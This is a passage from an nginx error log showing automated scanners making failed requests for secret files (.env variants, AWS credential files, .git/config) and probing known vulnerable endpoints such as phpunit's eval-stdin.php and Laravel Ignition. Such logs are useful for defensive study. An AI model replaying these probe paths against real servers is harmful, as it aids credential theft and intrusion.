18:18:00 [error] 350#350: *210859 open() "/var/www/html/.env-trace" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-trace HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:01 [error] 350#350: *210860 open() "/var/www/html/.env-queue" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-queue HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:01 [error] 350#350: *210861 open() "/var/www/html/.env-token" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-token HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:01 [error] 350#350: *210862 open() "/var/www/html/.env_panel" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env_panel HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:01 [error] 350#350: *210863 open() "/var/www/html/.env-nginx" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-nginx HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:01 [error] 350#350: *210864 open() "/var/www/html/.env.azure" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.azure HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:02 [error] 350#350: *210865 open() "/var/www/html/awstats.jsp" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /awstats.jsp HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:02 [error] 351#351: *210866 open() "/var/www/html/aws_keys.py" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /aws_keys.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:02 [error] 349#349: *212354 open() "/var/www/html/awstats.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /awstats.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:02 [error] 349#349: *212355 open() "/var/www/html/.aws/konfig" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.aws/konfig HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:03 [error] 349#349: *212356 open() "/var/www/html/.aws/.s3cfg" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.aws/.s3cfg HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:03 [error] 349#349: *212357 open() "/var/www/html/.aws/secret" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.aws/secret HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:04 [error] 349#349: *212358 open() "/var/www/html/awstats.txt" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /awstats.txt HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:04 [error] 349#349: *212359 open() "/var/www/html/aws/s3.yaml" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /aws/s3.yaml HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:04 [error] 349#349: *212360 open() "/var/www/html/painel/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /painel/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:05 [error] 350#350: *212361 open() "/var/www/html/tmp/.env.db" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /tmp/.env.db HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:06 [error] 350#350: *212362 open() "/var/www/html/source/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /source/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:06 [error] 350#350: *212363 open() "/var/www/html/tmp/env.bak" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /tmp/env.bak HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:06 [error] 350#350: *212364 open() "/var/www/html/storage.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /storage.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:06 [error] 350#350: *212365 open() "/var/www/html/strapi/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /strapi/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:06 [error] 350#350: *212366 open() "/var/www/html/qa/.env.bak" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /qa/.env.bak HTTP/1.1", host: "92.249.249.197" +2026/01/16 18:18:06 [error] 350#350: *212367 open() "/var/www/html/yii/env.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /yii/env.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 19:23:29 [error] 351#351: *212396 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 19:24:53 [error] 351#351: *212397 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 19:35:15 [error] 349#349: *213889 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 152.32.207.42, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "92.249.249.197" +2026/01/16 19:35:15 [error] 349#349: *213890 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 152.32.207.42, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "92.249.249.197" +2026/01/16 19:35:15 [error] 349#349: *213891 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 152.32.207.42, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 20:19:55 [error] 350#350: *213912 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 20:22:12 [error] 350#350: *213914 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 20:59:12 [error] 351#351: *213930 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 20:59:12 [error] 351#351: *213932 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 21:29:56 [error] 351#351: *213938 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 21:55:03 [error] 351#351: *213943 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 23:42:18 [error] 356#356: *213970 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 00:10:01 [error] 356#356: *213976 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/17 00:10:52 [error] 356#356: *213978 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 91.232.238.112, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "92.249.249.197" +2026/01/17 00:20:45 [error] 356#356: *213982 open() "/var/www/html/ssdpcgi" failed (2: No such file or directory), client: 87.120.187.41, server: localhost-nginx-proxy-manager, request: "POST /ssdpcgi HTTP/1.1", host: "92.249.249.197" +2026/01/17 00:20:51 [error] 356#356: *213983 open() "/var/www/html/_ignition/execute-solution" failed (2: No such file or directory), client: 87.120.187.41, server: localhost-nginx-proxy-manager, request: "GET /_ignition/execute-solution HTTP/1.1", host: "92.249.249.197" +2026/01/17 00:21:07 [error] 357#357: *213986 open() "/var/www/html/goform/setMacFilterCfg" failed (2: No such file or directory), client: 87.120.187.41, server: localhost-nginx-proxy-manager, request: "POST /goform/setMacFilterCfg HTTP/1.1", host: "92.249.249.197" +2026/01/17 01:04:16 [error] 357#357: *213992 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 01:18:01 [error] 357#357: *213998 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 02:16:20 [error] 359#359: *215525 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 02:25:30 [error] 356#356: *215529 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:30 [error] 356#356: *215530 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:30 [error] 356#356: *215531 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:30 [error] 356#356: *215532 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:30 [error] 356#356: *215533 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:30 [error] 356#356: *215534 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215536 open() "/var/www/html/debug/default/view" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /debug/default/view?panel=config HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215537 open() "/var/www/html/images/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /images/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215538 open() "/var/www/html/.env.save.1" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.save.1 HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215539 open() "/var/www/html/.json" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.json HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215540 open() "/var/www/html/library/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /library/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215541 open() "/var/www/html/API/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /API/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215542 open() "/var/www/html/client/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /client/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215543 open() "/var/www/html/blogs/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /blogs/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:31 [error] 357#357: *215544 open() "/var/www/html/settings/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /settings/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:32 [error] 357#357: *215545 open() "/var/www/html/.env.prod" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.prod HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:32 [error] 357#357: *215546 open() "/var/www/html/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /html/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:32 [error] 357#357: *215547 open() "/var/www/html/aws.yml" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /aws.yml HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:32 [error] 357#357: *215548 open() "/var/www/html/apis/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /apis/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:32 [error] 357#357: *215549 open() "/var/www/html/stage/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /stage/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 357#357: *215550 open() "/var/www/html/auth/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /auth/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 358#358: *215551 open() "/var/www/html/env.txt" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /env.txt HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 358#358: *215552 open() "/var/www/html/test.php" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /test.php HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 358#358: *215553 open() "/var/www/html/platform/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /platform/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 358#358: *215554 open() "/var/www/html/data/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /data/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 358#358: *215555 open() "/var/www/html/www/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /www/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 358#358: *215556 open() "/var/www/html/developer/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /developer/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 358#358: *215557 open() "/var/www/html/home/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /home/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 02:25:33 [error] 358#358: *215558 open() "/var/www/html/media/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /media/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 03:20:45 [error] 358#358: *215567 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 03:26:49 [error] 358#358: *215569 open() "/var/www/html/.env" failed (2: No such file or directory), client: 4.227.89.40, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 03:38:28 [error] 359#359: *215574 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 77.83.39.162, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/17 03:44:47 [error] 359#359: *215583 open() "/var/www/html/start.cfm" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /start.cfm HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:47 [error] 359#359: *215585 open() "/var/www/html/nmaplowercheck1768621483" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /nmaplowercheck1768621483 HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:47 [error] 359#359: *215589 open() "/var/www/html/rest/applinks/1.0/manifest" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /rest/applinks/1.0/manifest HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:47 [error] 359#359: *215591 open() "/var/www/html/nmaplowercheck1768621484" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /nmaplowercheck1768621484 HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:51 [error] 359#359: *215602 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:51 [error] 359#359: *215601 open() "/var/www/html/confluence/rest/applinks/1.0/manifest" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /confluence/rest/applinks/1.0/manifest HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:51 [error] 359#359: *215603 open() "/var/www/html/home.aspx" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /home.aspx HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:51 [error] 359#359: *215604 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 356#356: *215617 open() "/var/www/html/human.aspx" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /human.aspx?arg12=infotech HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 359#359: *215616 open() "/var/www/html/indice.shtml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /indice.shtml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 358#358: *215620 open() "/var/www/html/dana-na/nc/nc_gina_ver.txt" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 356#356: *215624 open() "/var/www/html/dana-cached/hc/HostCheckerInstaller.osx" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 356#356: *215623 open() "/var/www/html/webui" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /webui HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 356#356: *215626 open() "/var/www/html/default.jhtml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /default.jhtml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 356#356: *215629 "/var/www/html/CFIDE/componentutils/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /CFIDE/componentutils/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 356#356: *215628 open() "/var/www/html/dniapi/userInfos" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /dniapi/userInfos HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 356#356: *215632 open() "/var/www/html/login.php" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /login.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:52 [error] 356#356: *215636 open() "/var/www/html/geoserver/index.html" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /geoserver/index.html HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:53 [error] 356#356: *215639 open() "/var/www/html/main.asp" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /main.asp HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:53 [error] 357#357: *215644 open() "/var/www/html/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:53 [error] 356#356: *215642 open() "/var/www/html/Account/Login" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /Account/Login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:53 [error] 356#356: *215647 "/var/www/html/geoserver/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /geoserver/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:53 [error] 356#356: *215648 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:53 [error] 356#356: *215651 open() "/var/www/html/admin.jsp" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /admin.jsp HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:54 [error] 359#359: *217143 open() "/var/www/html/api/v1/check-version" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v1/check-version HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:54 [error] 359#359: *217142 open() "/var/www/html/magento_version" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /magento_version HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:54 [error] 359#359: *217147 open() "/var/www/html/helpdesk/WebObjects/Helpdesk.woa" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:54 [error] 359#359: *217149 open() "/var/www/html/start.shtml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /start.shtml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:54 [error] 359#359: *217151 open() "/var/www/html/cluster/list.query" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cluster/list.query HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:54 [error] 359#359: *217152 open() "/var/www/html/xml/info.xml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /xml/info.xml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:54 [error] 359#359: *217153 open() "/var/www/html/fog/management/index.php" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /fog/management/index.php?node=client&sub=logininfo HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:54 [error] 359#359: *217156 open() "/var/www/html/cgi-bin/info.cgi" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/info.cgi HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 359#359: *217159 open() "/var/www/html/api/server/version" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/server/version HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 359#359: *217163 open() "/var/www/html/apps/zxtm/login.cgi" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /apps/zxtm/login.cgi HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 359#359: *217166 open() "/var/www/html/base.pl" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /base.pl HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 356#356: *217168 open() "/var/www/html/language/en-GB/en-GB.xml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /language/en-GB/en-GB.xml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 356#356: *217169 open() "/var/www/html/administrator/manifests/files/joomla.xml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /administrator/manifests/files/joomla.xml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 356#356: *217171 open() "/var/www/html/versa/login" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /versa/login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 356#356: *217178 "/var/www/html/p/login/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /p/login/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 356#356: *217180 open() "/var/www/html/login.html" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /login.html HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 356#356: *217181 open() "/var/www/html/user" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /user HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 356#356: *217179 open() "/var/www/html/localstart.jsa" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /localstart.jsa HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:55 [error] 356#356: *217184 "/var/www/html/portal/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /portal/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:56 [error] 356#356: *217197 open() "/var/www/html/indice.jsa" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /indice.jsa HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:56 [error] 356#356: *217192 open() "/var/www/html/info.asp" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /info.asp HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:56 [error] 356#356: *217195 open() "/var/www/html/cgi-bin/param.cgi" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/param.cgi?get_device_conf HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:56 [error] 356#356: *217205 open() "/var/www/html/status" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /status HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:56 [error] 358#358: *217207 open() "/var/www/html/lms/db" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /lms/db HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:56 [error] 358#358: *217211 open() "/var/www/html/admin.shtml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET 